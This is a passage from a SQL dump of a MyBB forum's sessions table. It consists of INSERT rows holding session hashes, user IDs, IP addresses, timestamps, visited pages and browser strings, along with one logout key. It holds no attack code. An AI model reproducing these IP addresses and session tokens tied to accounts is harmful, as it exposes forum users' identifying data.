`uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('cdcde3bff68b2765d8153fdec8838eca', '297', '113.23.6.183', '1351343109', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.96 Safari', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0f188bff71ee6261757659e4dfbe41d6', '0', '129.121.102.35', '1352762461', '/member.php?&amp;action=register', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e1bcacdf30526d9e18b4d88ed5fc4bed', '294', '201.50.255.69', '1351894585', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('df3d3a1609d0ede64354e9807d48b893', '292', '216.218.102.116', '1351239004', '/index.php?', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('166b024e8ccf71997ae72a86f6beaa6e', '228', '83.83.167.183', '1352754885', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.1', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9332a6ad904dea60226dbac5debf633f', '307', '178.63.247.151', '1351662543', '/forumdisplay.php?fid=9', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '9', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('441709400acf452c7799c2536149c707', '299', '69.132.1.54', '1351452752', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4292c34c3af788033393efd69614db41', '305', '24.223.234.22', '1351608870', '/showthread.php?tid=74', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0', '0', '0', '12', '74'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c92cc1903633256bd608a47fa0431722', '308', '46.109.225.132', '1352330487', '/forumdisplay.php?fid=11', 'Opera/9.80 (Windows NT 6.1; WOW64; U; en) Presto/2.10.289 Version/12.02', '0', '0', '11', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('383190cefe1aaad289c01cce63b97b49', '300', '81.34.148.34', '1351460256', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3dd334d7f694126fa2ab11ffdce744e5', '302', '74.240.167.148', '1351808164', '/showthread.php?tid=1175&amp;pid=6892', 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4', '0', '0', '4', '1175'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('064ed695e811e4707680ce560cf656f9', '304', '109.63.12.49', '1351602535', '/forumdisplay.php?fid=12&amp;page=3', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; BTRS103662; SLCC2; .NET CLR 2.0.5072', '0', '0', '12', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e10fa76850df4132c64fde5d17ad216c', '198', '184.90.113.116', '1351734172', '/index.php?', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.122', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bac3c9f60b70392aeb02030d6bd72f2c', '301', '129.121.104.93', '1351702345', '/usercp.php?action=editsig', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f735ba4b89fc3fad8f6538fb46487ae6', '84', '111.91.95.12', '1352133647', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.1', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('59a479e52e65eb48c96e744bf7af82b5', '262', '108.162.138.186', '1352619851', '/showthread.php?tid=1236', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '3', '1236'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8bed260da255d263ace1e7f0b258ca35', '309', '95.10.175.178', '1351780680', '/forumdisplay.php?fid=9', 'Mozilla/5.0 (Windows NT 5.1; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '9', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('dd3d7b8bec86a098f178a988036c0ab6', '311', '112.210.100.164', '1352518062', '/showthread.php?tid=20', 'Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0', '0', '0', '13', '20'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('25ad906c8862668fd51919649998a86d', '312', '41.200.43.51', '1351965282', '/showthread.php?tid=964', 'Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '15', '964'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b078b23348b9830b21edac758aedf672', '199', '85.230.49.83', '1352805208', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c5efd1d4bdbeae9ff8f77c3746515cf2', '327', '72.95.249.219', '1352246107', '/showthread.php?tid=1118', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4', '0', '0', '9', '1118'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f980795f032a7306053e1df0da989deb', '67', '178.74.57.144', '1352820670', '/showthread.php?tid=1239&amp;pid=7542', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '84', '1239'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9c1351904d1221edc8f10442f3471022', '258', '139.190.235.246', '1352817692', '/showthread.php?tid=1241', 'Mozilla/5.0 (Windows NT 6.0; rv:18.0) Gecko/18.0 Firefox/18.0', '0', '0', '35', '1241'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ba27cc556eaaa3fbafd0bc70d02da02c', '315', '194.150.65.31', '1351937610', '/showthread.php?tid=1059', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4', '0', '0', '9', '1059'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3dc7579c92955c9886b84c838b9b68a2', '316', '106.206.163.177', '1352018730', '/newreply.php?ajax=1&amp;action=do_newreply&amp;tid=1149', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.6', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f6583be53c1331f138f901ccba701fc2', '313', '69.125.203.115', '1351877109', '/search.php?action=results&amp;sid=74538da239041f266ab6d5cd1c043f14', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8fcc36a87ce9fe50ac3fd496bb37903e', '310', '41.104.87.48', '1351894538', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bbdb5740ff2c0026778ee9355a51edb7', '297', '118.71.125.18', '1352145936', '/showthread.php?tid=1162', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.96 Safari', '0', '0', '12', '1162'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5f5103a9b6b49b82bb96071a6198f0be', '255', '27.97.172.200', '1352373119', '/forumdisplay.php?fid=54&amp;page=2', 'Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0 CometBird/11.0', '0', '0', '54', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c9a9243d45ef763a9157642593f017ec', '321', '24.191.244.156', '1352127957', '/showthread.php?tid=26', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.95 Safari/537.4', '0', '0', '17', '26'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ea891647cbdc8e84f798304de166e08f', '318', '174.31.250.155', '1351985775', '/showthread.php?tid=212&amp;page=5', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari', '0', '0', '58', '212'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ad161c03a3013ef025d4be213a71b712', '232', '78.150.46.86', '1352001220', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4c1a887fa873674d180bdfaa36f008b1', '0', '174.34.162.242', '1352823709', '/index.php?', 'Pingdom.com_bot_version_1.4_(http://www.pingdom.com)', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ab02c0140d05606de3b1ad047a5ac299', '319', '173.0.11.244', '1352201191', '/forumdisplay.php?fid=13', 'Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '13', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c53b95a26a7fdf288309eecf0845f877', '320', '79.24.200.253', '1352034824', '/showthread.php?tid=1149', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', '0', '0', '20', '1149'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a9983f9b237e4c31136a39b9240ede60', '0', '65.55.24.244', '1352818967', '/forumdisplay.php?fid=14', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '0', '0', '14', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6c9d1c8b35e5a6c580a31a4c52856440', '306', '184.6.224.250', '1352771619', '/showthread.php?tid=1211', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '18', '1211'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a27d32434f9136e8e7cb57cd58c2482c', '324', '67.181.154.90', '1352747822', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('16d3c330af3d98d079b8c2ab2fefce5f', '160', '142.255.31.241', '1352326739', '/private.php?action=read&amp;pmid=4041', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ae2dfd46bc699d444180df86b3b95b01', '325', '108.254.243.128', '1352763240', '/showthread.php?tid=1047', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '16', '1047'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c0230a58ed5136d4f657e189e5a439c2', '0', '188.40.115.199', '1352806020', '/index.php?', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.307.7 Saf', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('fb2d56d1635fd4fb215f7bb8a488aba5', '53', '188.155.56.90', '1352823357', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('85f209401351e16cc869d12b432dfcbd', '205', '210.50.40.19', '1352810003', '/index.php?', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .N', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('449e5a6948527af667ce783ebb29ac94', '0', '178.255.155.2', '1352823869', '/index.php?', 'Pingdom.com_bot_version_1.4_(http://www.pingdom.com)', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('03f36c5fa3a374af9d3a28c154ef5d6f', '0', '188.138.118.184', '1352823769', '/index.php?', 'Pingdom.com_bot_version_1.4_(http://www.pingdom.com)', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('825a74032206d4813752bd37096d7d03', '0', '184.75.210.186', '1352823891', '/index.php?', 'Pingdom.com_bot_version_1.4_(http://www.pingdom.com)', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('19bbf3a5875d338d0243ab7918363bda', '0', '174.34.156.130', '1352823649', '/index.php?', 'Pingdom.com_bot_version_1.4_(http://www.pingdom.com)', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0a818ac2b40f097e2a2bc8afb3a68dcc', '222', '74.67.7.114', '1352814916', '/index.php?', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d4e58c8ee85ee4a6730115a235c97309', '150', '81.151.0.106', '1352823143', '/newreply.php?ajax=1&amp;action=do_newreply&amp;tid=1256', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_1) AppleWebKit/536.25 (KHTML, like Gecko) Version/6.0 Sa', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5b9971bc3b519c0fcec6e0609c08c945', '0', '85.17.156.99', '1352823829', '/index.php?', 'Pingdom.com_bot_version_1.4_(http://www.pingdom.com)', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bot=1', '0', '66.249.74.6', '1352823252', '/showthread.php?tid=1124&amp;action=newpost', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', '0', '0', '42', '1124'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f71b339349f6638f59cbeafb34db002a', '329', '68.170.228.35', '1352377741', '/showthread.php?tid=1012', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari', '0', '0', '16', '1012'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('cfb42d09499bb3939f3af00ec33381ff', '330', '78.3.250.129', '1352373384', '/showthread.php?tid=1208', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.96 Safari', '0', '0', '9', '1208'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f78699e2c12f32bf8e86e40b8f2001f3', '5', '165.155.208.77', '1352393968', '/member.php?action=logout&amp;logoutkey=cb5fc7fc49bb8b131613e119572f8674', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.1', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('31d259d89db5161a9e3f2fa9aeeb4657', '333', '71.231.38.67', '1352625017', '/showthread.php?tid=1235', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.1', '0', '0', '42', '1235'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0b9be73abd32625b51850464ef0f6a34', '334', '107.205.69.168', '1352812100', '/usercp.php?', 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.1', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8a97f12b276109d21c743c56515127f6', '331', '195.60.76.223', '1352409541', '/showthread.php?tid=647', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4', '0', '0', '14', '647'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9c155201a3239f142e1f83198cdd4382', '332', '2.130.82.35', '1352548132', '/forumdisplay.php?fid=13', 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X; en-us) AppleWebKit/534.46.0 (KHTML, like Gecko', '0', '0', '13', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bot=18', '0', '204.236.226.210', '1352785253', 'thread-861.html', 'ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7ec5019a7911391a07d392c2117d3560', '338', '173.206.71.165', '1352504168', '/showthread.php?tid=745', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '59', '745'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ffbb755e9c18bcdc255cc4a07eac809b', '0', '31.153.62.231', '1352745426', '/index.php?', 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.1', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ca26fdb400122a48fb4b6c117c8cdaf6', '0', '173.252.101.117', '1352716512', '/showthread.php?tid=691&amp;action=lastpost', 'facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)', '0', '0', '3', '691'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d5628a40b052b34b7d414ee0fff83cb8', '0', '199.21.99.84', '1352818824', '/index.php?', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('67b1614fdd2f0b5dcd502fd9af662f24', '335', '110.36.19.190', '1352454409', '/search.php?action=results&amp;sid=c15427bfec93fe10bd7ec7b1b3859473', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('16aac790f0713a1a0b9a7bbc3e71bc9f', '0', '50.57.131.145', '1352708238', '/index.php?', 'Ruby', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b703219b37efd34055be3d6de97d7a82', '232', '78.150.34.195', '1352516717', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('61a432f0d489fb4e73b898439aeaaa16', '0', '186.81.187.148', '1352769607', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('373b04925bb7d622164e490f88fca6a9', '336', '94.0.114.45', '1352470846', '/contact.php?&amp;action=do_send_contact', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4c0cca1650bd7e40830c4ea6ca21e1a3', '0', '173.245.62.14', '1352762534', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('488df718e1ef886e7ac09f524dad0d7a', '323', '216.119.145.99', '1352479043', '/showthread.php?tid=26', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.70 Safari/535.11', '0', '0', '17', '26'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5fb42de57886d2c7307b4f20733544d8', '0', '174.176.189.231', '1352769606', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c975ad98e23c3ab39d60031e624ed801', '0', '178.161.148.31', '1352769601', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('681adcad72cf76d43ed2cfd307846562', '0', '26.54.74.64', '1352769631', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8f4dda3e77c6f306a8d0ccd5dc1a50f6', '0', '61.116.123.23', '1352769598', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('eef904ca78926561a1c443a7c1abf92b', '339', '81.96.99.120', '1352517104', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.1', '0', '0', '0', '0'); INSERT 